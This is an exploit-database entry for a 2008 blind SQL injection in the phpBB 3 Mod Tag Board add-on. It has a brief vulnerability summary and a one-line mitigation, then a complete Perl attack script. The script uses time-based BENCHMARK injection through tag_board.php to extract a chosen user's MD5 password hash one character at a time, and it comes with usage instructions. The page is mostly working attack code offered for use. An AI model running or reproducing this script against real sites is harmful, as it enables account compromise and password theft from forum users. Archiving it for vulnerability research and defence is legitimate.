phpBB 3 (Mod Tag Board - exploit.company

vendor:

phpBB 3

by:

athos

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpBB 3

Affected Version From: Mod Tag Board <= 4

Affected Version To: Mod Tag Board <= 4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

This exploit allows an attacker to gain access to the MD5 hash of a user's password by exploiting a blind SQL injection vulnerability in phpBB 3 Mod Tag Board <= 4. The exploit works regardless of the PHP.ini settings and requires the host, table prefix, and user ID as parameters.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl 
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit  
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102); 
my $http  = new LWP::UserAgent;

my $host  = shift;
my $table = shift;
my $myid  = shift or &usage;


sub injection
{
    my ($sub,$char) = @_;
    
    return "/tag_board.php?mode=controlpanel&action=delete&id=".
           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
           "ers+where+user_id=${myid})--";
}


sub usage
{
    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
    exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
    for my $j(0..16)
    {
        $time1 = time();

        $http->get($host.injection($i,$chars[$j]));
        
        $time2 = time();

        if($time2 - $time1 > 6)
        {
            syswrite(STDOUT,chr($chars[$j]));
            $hash .= chr($chars[$j]); 
            last;
        }
        
        if($i == 1 && length $hash < 0)
        {
            syswrite(STDOUT,"Exploit Failed!\n");
            exit;
        } 
    }
}

# milw0rm.com [2008-12-08]